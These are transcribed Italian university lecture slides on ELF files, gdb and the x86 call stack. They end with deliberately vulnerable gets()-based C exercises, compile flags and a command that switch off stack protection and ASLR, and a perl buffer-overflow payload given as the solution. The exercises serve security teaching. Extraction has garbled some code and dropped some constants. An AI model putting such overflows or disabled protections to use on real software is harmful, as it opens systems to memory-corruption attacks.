Sicurezza Informatica

Transcription

1 Sicurezza Informatica Lez. 2 Formato file e Assembler (II parte)

2 Avviso Causa sovrapposizione orario lezione con Consiglio di Dipartimento si propone di anticipare la lezione del 14/10 al 13/10 aula ALFA ore 13.30

3 I FORMATI DI UN FILE

4 Sorgente #include<stdio.h> int main(void) { int n = 6; float f=1; int i = 1; for(; i<=n; i++) f=f*i; printf("\n Factorial is : [%f]\n",f); return 0; }

5 From src to exe Editor (es. vi) source (es. *.c. *.as) Object code (es. *.o, *.obj) Compilatore (es. gcc) Debugging information Linker (es. ld) Exec file

6 A more refined model C program: foo.c Compiler Assembly program: foo.s Assembler Object(mach lang module): foo.o Linker lib.o Executable(mach lang pgm): a.out Loader Memory

7 ELF (EXECUTABLE AND LINKABLE FORMAT)

8 .elf It is a common standard file format for executables, object code, shared libraries, and core dumps First published in the System V Application Binary Interface specification,and later in the Tool Interface Standard, it was quickly accepted among different vendors of Unix systems In 1999 it was chosen as the standard binary file format for Unix and Unix-like systems on x86 by the 86open project

9 .elf An ELF binary starts with a fixed-length ELF header, followed by a variable-length program header listing each of the program sections to be loaded The ELF format specifies two "views" of an ELF file -- one is used for linking and the other is used for execution. This affords significant flexibility for systems designers We talk about sections in object code waiting to be linked into an executable. One or more sections map to a segment in the executable.

10 .elf

11 Elf Header #define ELF_MAGIC 0x464C457FU /* "\x.elf" in little endian */ struct Elf { uint32_t e_magic; // must equal ELF_MAGIC uint8_t e_elf[12]; uint16_t e_type; uint16_t e_machine; uint32_t e_version; uint32_t e_entry; uint32_t e_phoff; uint32_t e_shoff; uint32_t e_flags; uint16_t e_ehsize; uint16_t e_phentsize; uint16_t e_phnum; uint16_t e_shentsize; uint16_t e_shnum; uint16_t e_shstrndx; };

12 Header: campi importanti e_entry This member gives the virtual address to which the system first transfers control, thus starting the process. If the file has no associated entry point, this member holds zero. e_phoff This member holds the program header table s file offset in bytes. If the file has no program header table, this member holds zero. e_shoff This member holds the section header table s file offset in bytes. If the file has no section header table, this member holds zero. e_flags This member holds processor-specific flags associated with the file. Flag names takethe form EF_machine _flag. See Machine Information for flag definitions. e_ehsize This member holds the ELF header s size in bytes. e_phentsize This member holds the size in bytes of one entry in the file s program header table; all entries are the same size. e_phnum This member holds the number of entries in the program header table. Thus the product of e_phentsize and e_phnum gives the table s size in bytes. If a file has no program header table, e_phnum holds the value zero.

13 .elf

14 Program Header The ELF header actually points to another group of headers called the program headers These headers describe to the operating system anything that might be required for it to load the binary into memory and execute it Segments are described by program headers, but so are some other things required to get the executable running

15 ELF header and Program header ELF header definition contains fields e_phoff, e_phnum and e_phentsize; these are simply the offset in the file where the program headers start, how many program headers there are and how big each program header is With these three information you can easily find and read the program headers

16 Proghdr struct Proghdr {! uint32_t p_type;! }; uint32_t p_offset;! uint32_t p_va;! uint32_t p_pa;! uint32_t p_filesz;! uint32_t p_memsz;! uint32_t p_flags;! uint32_t p_align;!

17 Which segments The C definitions for these ELF headers are in inc/ elf.h. The program segments we're interested in are:.text: the program's executable instructions.rodata: read-only data, such as ASCII string constants produced by the C compiler. (We will not bother setting up the hardware to prohibit writing, however.).data: The data section holds the program's initialized data, such as global variables declared with initializers like int x = 5;..bss

18 .elf When the linker computes the memory layout of a program, it reserves space for uninitialized global variables, such as int x; in a section called.bss that immediately follows.data in memory C requires that "uninitialized" global variables start with a value of zero. Thus there is no need to store contents for.bss in the ELF binary; instead, the linker records just the address and size of the.bss section. The loader or the program itself must arrange to zero the.bss section.

19 Various tools for various formats Depending on the file format we use different tools for inspecting their content: Editor (vi, vim, emacs, ) for source files Objdump for obj and exe files A c object file is obtained by using the -c option in GCC, the suffix of an object file is.o An executable file is obtained by using the -o option in GCC, executable files usually have no suffixes

20 objdump

21 objdump d fattoriale.o

22 objdump h fattoriale.o

23 objdump h fattoriale

24 objdump h (2)

25 objdump h (3)

26 GDB

27 Why use a debugger? No one writes perfect code first time, every time Desk checking code can be tedious and error-prone Putting print statements in the code requires recompilation and a guess as to the source of the problem Debuggers are powerful and flexible

28 Common debugger functions Run program Stop program at breakpoints Execute one line at a time Display values of variables Show sequence of function calls

29 The GNU debugger (gdb) A debugger is closely tied to the compiler. gcc gdb, cxx ladebug, cc - dbx Command line debugger for gnu's compilers (gcc, g++) gdb The most common way to invoke: gdb executable

30 Invoking gdb Start debugging an executable gdb executable * Load a corefile gdb executable [-c] corefile Attach to a running process gdb executable pid as long as pid is not a file in the current directory

31 Inspecting a corefile When a program crashes it may leave a core dump which can be used to figure out exactly why the program crashed Core dumps are disabled by default on many Linux distributions they can be enabled with the command $ulimit c unlimited You can look at any corefile to see the state of the corresponding program at the time of the crash Load executable and corefile into the debugger Use GDB's backtrace (bt) command to see the call stack

32 Running a program in GDB You can run programs in the debugger see value of variables and expressions look at source code as it's executed change the value of variables move the execution pointer many other things

33 Compile for debugging When compiling your program, add the g flag to the command line: gcc -g -o prog prog.c This adds extra symbol information, so the debugger knows how you called the variables in your source, can show you the source code and which line will be executed next

34 Looking at your source list or l (list code) list list main list 56 list 53,77

35 Breakpoints A place where execution pauses, waits for a user command Can break at a function, a line number, or on a certain condition break or b (set a breakpoint) break main break 10 watch expr

36 Execution commands run or r (run program from beginning) run run arglist Or, you can set arguments to be passed to the program this way: set args arglist start starts debugging, breaks at main kill stops debugging

37 More Execution commands next or n execute next line, stepping over function calls step or s execute next line, stepping into function calls continue or cont resume execution, until next breakpoint

38 Examining data print [expr] print [/format] [expr] print /d x print x*y print function(x) printf X=%d, Y=%d\n,X,Y display (continuously display value) undisplay (remove displayed value) where (show current function stack) set (change a value) set n=3

39 Miscellaneous commands help or h (display help text) help help step help breakpoints quit or q (quit gdb)

40 Registers content Registers name is prefixed by $. $pc indicates the program counter and $sp the stack pointer (gdb) info registers Shows the contents of all general purpose registers (gdb) info all-registers Shows all registers Es. (gdb) p/x $pc $6 = 0x Shows the content of the program counter (gdb) x/i $pc lea 0xffffffe8(%ebp),%eax 0x <main+30>: Show the content of the memory addressed by pc (gdb) set $sp += 4 Modify the stack pointer s value

41 gdb exercise The programs below are buggy Copy the files to your local file system; then, compile and run Do you see the problem? Can you fix it easily? gdb will help Use gdb to examine programs behavior and fix the bug

42 .text.global _start _start: GBD 1 # section declaration # we must export the entry point to the ELF linker or # loader. They conventionally recognize _start as # entry point. Use ld -e foo to override the default # write our string to stdout movl len,%edx # third argument: message length movl $msg,%ecx # second argument: pointer to msg movl $1,%ebx # first argument: file handle (stdout) movl $4,%eax # system call number (sys_write) int $0x80 # call kernel and exit movl $0,%ebx # first argument: exit code movl $1,%eax # system call number (sys_exit) int $0x80 # call kernel.data # section declaration msg:.ascii "Hello, world!\n"# our dear string len =. - msg # length of our dear string

43 GDB 2 1 : #include <stdio.h> 2 : #include <ctype.h> 3 : 4 : int main(int argc, char **argv) 5 : { 6 : char c; 7 : 8 : c = fgetc(stdin); 9 : while(c!= EOF){ 10: 11: if(isalnum(c)) 12: printf("%c", c); 13: else 14: c = fgetc(stdin); 15: } 16: 17: return 1; 18: }

44 ASSEMBLER (II PARTE)

45 Memory Layout

46 Memory Layout

47 Stack

48 Where is stored msg?

49 Why on the stack and not in.data?

50 Stack Many CPU s have built-in support for a stack a Last-In First-Out (LIFO) list The stack is an area of memory that is organized in this fashion. The PUSH instruction adds data to the stack and the POP instruction removes data The data removed is always the last data added The ESP register contains the address of the data that would be removed from the stack. This data is said to be at the top of the stack The processor references the SS register automatically for all stack operations. Also, the CALL, RET, PUSH, POP, ENTER, and LEAVE instructions all perform operations on the current stack. Data can only be added in double word units. That is, one can not push a single byte on the stack

51 Stack

52 Runtime Stack Managed by the CPU, using two registers SS (stack segment) ESP (stack pointer) * Offset FFC 00000FF FF FF ESP

53 PUSH The PUSH instruction inserts a double word on the stack by subtracting 4 from ESP and then stores the double word at [ESP] pushl src à subl $4,%esp movl src,(%esp) The 80x86 also provides a PUSHA instruction that pushes the values of EAX, EBX, ECX, EDX, ESI, EDI and EBP registers (not in this order)

54 PUSH Operation (1 of 2) A 32-bit push operation decrements the stack pointer by 4 and copies a value into the location pointed to by the stack pointer. BEFORE AFTER ESP FFC 00000FFC A5 ESP 00000FF FF FF FF FF FF0

55 PUSH Operation (2 of 2) This is the same stack, after pushing two more integers: Offset FFC 00000FF FF FF A ESP The stack grows downward. The area below ESP is always available (unless the stack has overflowed).

56 POP The POP instruction reads the double word at [ESP] and then adds 4 to ESP popl dest à movl (%esp),dest addl $4,%esp The popa instruction, recovers the original values of the registers saved by the pusha

57 POP Operation Copies a value at stack[esp] into a register or variable Adds n to ESP, where n is either 2 or 4. depends on the operand receiving the data BEFORE AFTER FFC A FFC A FF FF ESP 00000FF ESP 00000FF FF FF0

58 Esercizio Scrivere un programma in assembler che inverte il contenuto di una stringa data. Esempio: Data la stringa: Hello World! Stampa la stringa:!dlrow olleh

59 The stack for managing function call Calling and returning How does caller function jump to callee function? How does callee function jump back to the right place in caller function? Passing parameters How does caller function pass parameters to callee function? Storing local variables Where does callee function store its local variables? Handling registers How do caller and callee functions use same registers without interference? Returning a value How does callee function send return value back to caller function?

60 Calling and returning How does caller function jump to callee function? I.e., Jump to the address of the callee s first instruction How does the callee function jump back to the right place in caller function? Jump to the instruction immediately following the most-recently-executed call instruction

61 CALL/RET The 80x86 provides two instructions that use the stack to make calling subprograms quick and easy. The CALL instruction makes an unconditional jump to a subprogram and pushes the address of the next instruction on the stack The RET instruction pops off an address and jumps to that address When using these instructions, it is very important that one manage the stack correctly so that the right number is popped off by the RET instruction

62 Implementation of Call call subprogram1 becomes: pushl %eip jmp subprogram1 ESP à Saved EIP

63 Implementation of ret ret becomes: pop %eip ESP à Saved EIP

64 Passing Parameters How does caller function pass parameters to callee function? Attempted solution: Pass parameters in registers Problem: Cannot handle nested function calls Also: How to pass parameters that are longer than 4 bytes? Caller pushes parameters before executing the call instruction Parameters are pushed in the reverse order Push the nth parameter first Push 1 parameter last

65 Parameter Parameter n Parameter ESP before à call Parameter 1

66 Parameter ESP after à call Parameter n Parameter Parameter 1 Saved EIP Callee addresses params relative to ESP: Param 1 as 4(%esp)

67 Parameter After returning, the caller pops the parameters from the stack sub: # Push parameters pushl $5 movl 4(%esp),var1 pushl $4 movl 8(%esp),var2 pushl $3 movl 12(%esp), var3 call sub # Pop parameters ret addl $12, %esp

68 %ebp As callee executes, ESP may change E.g., preparing to call another function It can be very error prone to use ESP when referencing parameters. To solve this problem, the supplies another register to use: EBP. This register s only purpose is to reference data on the stack Use EBP as fixed reference point to access params

69 Using EBP (prolog) A subprogram before overwriting ebp first save the old value of EBP on the stack and then set EBP to be equal to ESP. This allows ESP to change as data is pushed or popped off the stack without modifying EBP pushl %ebp movl %esp, %ebp (sub Local_bytes, %esp) Regardless of ESP, the subprogram can reference param 1 as 8(%ebp), param 2 as 12(%ebp), etc.

70 Using ebp (epilog) Before returning, callee must restore ESP and EBP to their old values executing the epilog movl %ebp, %esp popl %ebp ret

71 Enter/Leave The ENTER instruction performs the prologue code and the LEAVE performs the epilogue The ENTER instruction takes two immediate operands. For the C calling convention, the second operand is always 0. The first operand is the number bytes needed by local variables. The LEAVE instruction has no operands Sicurezza Informatica Danilo Bruschi

72 Epilogo Parameter n Parameter à movl %ebp, %esp popl %ebp ret Ebp à Parameter 1 Saved EIP Old EBP Esp à

73 Epilogo Parameter n Parameter Parameter Old EBP 1 à movl %ebp, %esp popl %ebp ret Esp = Ebp à Saved Saved EIP EIP Parameter Old EBP 1 Parameter Parameter n Old Esp à

74 Epilogo Ebp à Parameter n à movl %ebp, %esp popl %ebp ret Esp à Parameter Parameter 1 Saved EIP

75 Epilogo Ebp à Parameter n à movl %ebp, %esp popl %ebp ret Esp à Parameter Parameter 1

76 Storing local variables Where does callee function store its local variables? Local variables: Short-lived, so don t need a permanent location in Memory Size known in advance, so don t need to allocate on the heap The function just uses the top of the stack Local variables of the callee are allocated on the stack by moving the stack pointer subl $8,%esp #allocate memory for 2 integers Reference local variables as negative offsets relative to EBP

77 Registers Handling How do caller and callee functions use same registers without interference? Callee may use a register that the caller also is using Solution: save the registers on the stack Someone must save old register contents Someone must later restore the register contents Define a convention for who saves and restores which registers

78 Registers handling Caller-save registers EAX, EBX, ECX (when necessary ) Saves on stack before call Restores from stack after call Callee-save registers EAX, EBX, ECX (when necessary) Saves on stack after prolog Restores from stack before epilog

79 Stack Frame Any active function has its own stack frame Stack frame contains: Return address (Saved EIP) Old EBP Saved register values Local variables Parameters to be passed to callee function ESP points to top (low memory) of current stack frame EBP points to bottom (high memory) of current stack frame

80 Example: stack.c #include <stdio.h> int main() { int x = foo( 10 ); printf( "the value of x = %d\n", x ); return 0; } int foo( int i ) { int ii = i + i; int iii = bar( ii ); int iiii = iii; return iiii; } int bar( int j ) { int jj = j + j; return jj; } Compiliamo con il comando gcc S stack.c - o stack.s

81 Lo stack che ci aspettiamo Ret. Addr. Saved EBP x param. 1 Ret. Addr. Main Saved EBP main foo iiii iii ii param. 1 ESP à Ret. Addr. foo Saved EBP jj bar

82 .file "stack.c".section.rodata.lc0:.string "the value of x = %d\n".text.globl main.type main: leal 4(%esp), %ecx andl $-16, %esp pushl -4(%ecx) pushl %ebp movl %esp, %ebp pushl %ecx subl $36, %esp movl $10, (%esp) call foo movl %eax, -8(%ebp) movl -8(%ebp), %eax movl %eax, 4(%esp) movl $.LC0, (%esp) call printf movl $0, %eax addl $36, %esp popl %ecx popl %ebp Assembler: main

83 Assembler : foo.globl foo.type foo: pushl movl subl movl addl movl movl movl call movl movl movl movl leave ret.size %ebp %esp, %ebp $24, %esp 8(%ebp), %eax %eax, %eax %eax, -12(%ebp) -12(%ebp), %eax %eax, (%esp) bar %eax, -8(%ebp) -8(%ebp), %eax %eax, -4(%ebp) -4(%ebp), %eax foo,.-foo

84 Assembler: bar.globl bar.type bar: pushl movl subl movl addl movl movl leave ret.size %ebp %esp, %ebp $16, %esp 8(%ebp), %eax %eax, %eax %eax, -4(%ebp) -4(%ebp), %eax bar,.-bar

85 Compilazione ottimizzata Non Ottimizzata Ottimizzata.globl bar.type bar: pushl movl subl movl addl movl movl leave ret. %ebp %esp, %ebp $16, %esp 8(%ebp), %eax %eax, %eax %eax, -4(%ebp) -4(%ebp), %eax.globl bar.type bar: pushl movl movl addl popl ret %ebp %esp, %ebp 8(%ebp), %eax %eax, %eax %ebp

86 Compilazione ottimizzata Non Ottimizzata Ottimizzata.globl foo.type foo: pushl movl subl movl addl %ebp %esp, %ebp $24, %esp 8(%ebp), %eax %eax, %eax.globl foo.type foo: pushl movl subl movl %ebp %esp, %ebp $4, %esp 8(%ebp), %eax movl %eax, -12(%ebp) addl %eax, %eax movl movl call movl movl -12(%ebp), %eax %eax, (%esp) bar %eax, -8(%ebp) -8(%ebp), %eax movl call leave ret %eax, (%esp) bar movl %eax, -4(%ebp) movl -4(%ebp), %eax leave ret

87 Esercizio 1 /* stack1-stdin.c * * specially crafted to feed your brain by gera InsecureProgramming */ #include <stdio.h> int main() { int cookie; char buf[80]; printf("buf: %08x cookie: %08x\n", &buf, &cookie); gets(buf); } if (cookie == 0x ) printf("you win!\n");

88 Compile Compile (64/32): gcc -fno-stack-protector -z execstack (-m32) classic.c -o classic Disable ASLR: echo 0 > /proc/sys/kerne/randomize_va_space Solution perl -e 'print "A" x 92. "DCBA"'./gera1

89 Esercizio 2 /* stack2-stdin.c * * specially crafted to feed your brain by gera */ #include <stdio.h> int main() { int cookie; char buf[80]; printf("buf: %08x cookie: %08x\n", &buf, &cookie); gets(buf); } if (cookie == 0x ) printf("you win!\n");